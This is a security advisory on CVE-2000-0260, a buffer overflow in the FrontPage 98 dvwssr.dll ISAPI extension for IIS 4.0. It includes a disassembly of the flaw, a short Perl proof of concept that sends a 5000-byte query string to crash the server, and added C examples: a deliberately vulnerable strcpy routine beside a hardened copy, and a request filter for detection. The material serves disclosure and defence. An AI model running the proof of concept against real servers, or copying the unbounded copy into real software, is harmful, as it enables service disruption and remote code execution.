MS IIS FrontPage 98 Extensions Buffer Overflow Vulnerability
Date Published: 2000-04-14
Last Update: 2000-04-14
Advisory ID: CORE-041200
Bugtraq ID: 1109
CVE Name: CVE-2000-0260
Title: MS IIS FrontPage 98 Extensions Buffer Overflow Vulnerability
Class: Boundary Error Condition (Buffer Overflow)
Remotely Exploitable: Yes
Locally Exploitable: No
Release Mode: USER RELEASE
The dvwssr.dll included with the FrontPage 98 extensions for IIS and shipped as part of the NT Option Pack has a remotely exploitable buffer overflow. A successful attack stops the service from accepting connections and may allow remote code execution on the vulnerable host.
Vulnerable Packages/Systems:
  . Microsoft FrontPage 98 Server Extensions for IIS
    - Microsoft FrontPage 98
    - Microsoft IIS 4.0
    - Microsoft NT Option Pack for NT 4.0
  . Microsoft InterDev 1.0
    - Microsoft Windows NT 4.0
Workaround: Delete DVWSSR.DLL (this may break InterDev).
This vulnerability was found by Gerardo Richarte and Alberto Soliño from Core Security Technologies.
Technical Description - Exploit/Concept Code:
We have been playing with dvwssr.dll and we've found a buffer overflow that, at the very least, stops the server from accepting incoming connections.
The code where the buffer overflow resides is:
mov eax, [edi+TEXTENSION_CONTROL_BLOCK.lpszQueryString]
test eax, eax
lea eax, [esp+14h+queryStringCoph]
call ds:lstrcpyA ;see here MS ENGINEERS: BUFFER OVERFLOW
test eax, eax
lea eax, [esp+10h+queryStringCoph]
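The disassembly above shows the whole bug: the attacker-controlled query string from the extension control block is handed to lstrcpyA with no length check, and the destination is a fixed-size buffer on the stack. The following C program is an added example, not code from the Core advisory or from dvwssr.dll, that reproduces the same pattern next to a hardened replacement. The reduced EXTENSION_CONTROL_BLOCK layout, the 256-byte buffer size, and the use of strcpy in place of lstrcpyA are assumptions made for the example; the real buffer size in dvwssr.dll is not stated in the advisory.

```c
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

/* Stand-in for the ISAPI EXTENSION_CONTROL_BLOCK, reduced to the one field the
   disassembly reads.  The real structure has many more members; this layout is
   an assumption made for the example. */
typedef struct {
    const char *lpszQueryString;
} EXTENSION_CONTROL_BLOCK;

/* Size of the stack buffer the query string is copied into.  The real size in
   dvwssr.dll is not given in the advisory; 256 is an assumed value. */
#define QUERY_COPY_SIZE 256

/* The vulnerable pattern from the disassembly: an unbounded copy of the query
   string into a fixed-size stack buffer (strcpy stands in for lstrcpyA).  Any
   query string of QUERY_COPY_SIZE bytes or more smashes the stack: undefined
   behaviour, i.e. the crash, or with a crafted string the control-flow hijack,
   that the advisory describes. */
size_t copy_query_vulnerable(const EXTENSION_CONTROL_BLOCK *ecb)
{
    char queryStringCopy[QUERY_COPY_SIZE];
    strcpy(queryStringCopy, ecb->lpszQueryString);   /* no length check at all */
    return strlen(queryStringCopy);
}

/* Hardened form: locate the terminator within the space available before copying,
   and refuse (rather than silently truncate) anything that does not fit.
   Returns 0 on success, -1 when the query string is rejected. */
int copy_query_hardened(const EXTENSION_CONTROL_BLOCK *ecb, char *out, size_t out_size)
{
    const char *q = ecb->lpszQueryString ? ecb->lpszQueryString : "";
    const char *nul = memchr(q, '\0', out_size);   /* never look past out_size bytes */
    if (nul == NULL)
        return -1;                                  /* no room for the data plus NUL */
    memcpy(out, q, (size_t)(nul - q) + 1);
    return 0;
}

/* Drives the hardened copy with a query string of n 'a' bytes (the shape of the
   advisory's PoC).  Returns 1 if accepted, 0 if rejected. */
int hardened_accepts_query_of_length(size_t n)
{
    char *q = malloc(n + 1);
    if (!q) return 0;
    memset(q, 'a', n);
    q[n] = '\0';
    EXTENSION_CONTROL_BLOCK ecb = { q };
    char out[QUERY_COPY_SIZE];
    int ok = copy_query_hardened(&ecb, out, sizeof out) == 0;
    free(q);
    return ok;
}

/* Drives the vulnerable copy only with a query string that still fits, so the
   demo itself never corrupts the stack; returns the copied length, or 0 when
   the input would have overflowed. */
size_t vulnerable_copy_length(size_t n)
{
    if (n >= QUERY_COPY_SIZE) return 0;   /* refuse to trigger the overflow here */
    char *q = malloc(n + 1);
    if (!q) return 0;
    memset(q, 'a', n);
    q[n] = '\0';
    EXTENSION_CONTROL_BLOCK ecb = { q };
    size_t len = copy_query_vulnerable(&ecb);
    free(q);
    return len;
}

int main(void)
{
    printf("hardened, 3 bytes:    %s\n", hardened_accepts_query_of_length(3) ? "accepted" : "rejected");
    printf("hardened, 5000 bytes: %s\n", hardened_accepts_query_of_length(5000) ? "accepted" : "rejected");
    printf("vulnerable, 100 bytes copied: %zu\n", vulnerable_copy_length(100));
    return 0;
}
```

Rejecting oversized input, as opposed to truncating it with a bounded copy, is the safer choice here: a silently truncated query string would still reach whatever parses it next, with a different meaning than the client sent.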
Of course, having the source code makes it harder to find this type of bug...
So, below is an example of how to exploit this vulnerability (Perl; send the output to port 80 of the target, e.g. through nc):

#!/usr/bin/perl
# Builds a GET request whose query string is 5000 bytes long; dvwssr.dll copies
# it with lstrcpyA into a fixed-size stack buffer.
print "GET /_vti_bin/_vti_aut/dvwssr.dll?";
print "a" x 5000;
print " HTTP/1.1\r\n\r\n";
We've been playing a little more, trying to exploit this buffer overflow. As we don't have InterDev installed on our IIS, we copied the .dll to the /msadc directory, and with this configuration we have been able to make the code jump into our buffer.
Under these circumstances the buffer overflow allows execution of arbitrary code on the target machine. It's interesting to note that no log entry is generated as an effect of this attack.
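Because the attack leaves no entry in the IIS log, the only place to see it is on the wire, i.e. in a reverse proxy, IDS or packet capture in front of the server. The following C filter is an added example, not part of the Core advisory: it inspects an HTTP request line and flags requests to dvwssr.dll whose query string exceeds a length threshold, which is the signature of the request shown above. The 1024-byte threshold, the sample request lines, and the function names are assumptions constructed for this example.

```c
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <ctype.h>

/* Path requested by the advisory's exploit. */
static const char DVWSSR_PATH[] = "/_vti_bin/_vti_aut/dvwssr.dll";

/* Case-insensitive prefix compare (IIS paths are case-insensitive).
   Stops safely at the end of s because tolower(0) never matches a prefix byte. */
static int prefix_icase(const char *s, const char *prefix)
{
    for (; *prefix; s++, prefix++)
        if (tolower((unsigned char)*s) != tolower((unsigned char)*prefix))
            return 0;
    return 1;
}

/* Inspect one HTTP request line ("METHOD /path?query HTTP/x.y").
   Returns the query-string length if the request targets dvwssr.dll and the
   query string is longer than max_query bytes, otherwise 0.  The threshold is
   a tuning assumption; the PoC's 5000 bytes is far above any normal call. */
size_t dvwssr_overflow_attempt(const char *request_line, size_t max_query)
{
    const char *sp = strchr(request_line, ' ');
    if (!sp) return 0;                         /* not a request line */
    const char *path = sp + 1;
    if (!prefix_icase(path, DVWSSR_PATH)) return 0;
    const char *p = path + strlen(DVWSSR_PATH);
    if (*p != '?') return 0;                   /* different file, or no query string */
    const char *q = p + 1;
    const char *end = strchr(q, ' ');          /* query ends before " HTTP/x.y" */
    size_t qlen = end ? (size_t)(end - q) : strlen(q);
    return qlen > max_query ? qlen : 0;
}

/* Constructed sample: the advisory's PoC request line with n 'a' bytes. */
char *make_poc_request(size_t n)
{
    const char *head = "GET /_vti_bin/_vti_aut/dvwssr.dll?";
    const char *tail = " HTTP/1.1";
    char *buf = malloc(strlen(head) + n + strlen(tail) + 1);
    if (!buf) return NULL;
    strcpy(buf, head);
    memset(buf + strlen(head), 'a', n);
    strcpy(buf + strlen(head) + n, tail);
    return buf;
}

/* Runs the filter over the 5000-byte PoC at a 1024-byte threshold and returns
   the flagged query length (5000), or 0 if it were missed. */
size_t poc_flagged_length(void)
{
    char *req = make_poc_request(5000);
    size_t r = req ? dvwssr_overflow_attempt(req, 1024) : 0;
    free(req);
    return r;
}

int main(void)
{
    /* constructed sample lines: an ordinary call to the DLL, and the PoC */
    const char *normal = "GET /_vti_bin/_vti_aut/dvwssr.dll?a=1 HTTP/1.1";
    printf("normal request flagged length: %zu\n", dvwssr_overflow_attempt(normal, 1024));
    printf("PoC request flagged length:    %zu\n", poc_flagged_length());
    return 0;
}
```

The check is deliberately tied to the request line rather than to the server's own logging, since the request crashes the process before any log record is written.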
About Core Security Technologies
Core Security Technologies develops strategic security solutions for Fortune 1000 corporations, government agencies and military organizations. The company offers information security software and services designed to assess risk and protect and manage information assets.
Headquartered in Boston, MA, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com.
To learn more about CORE IMPACT, the first comprehensive penetration testing framework, visit:
The contents of this advisory are copyright (c) 2003 CORE Security Technologies and may be distributed freely provided that no fee is charged for this distribution and proper credit is given.
$Id: iis4-advisory.txt,v 1.1 2003/04/15 16:06:11 carlos Exp $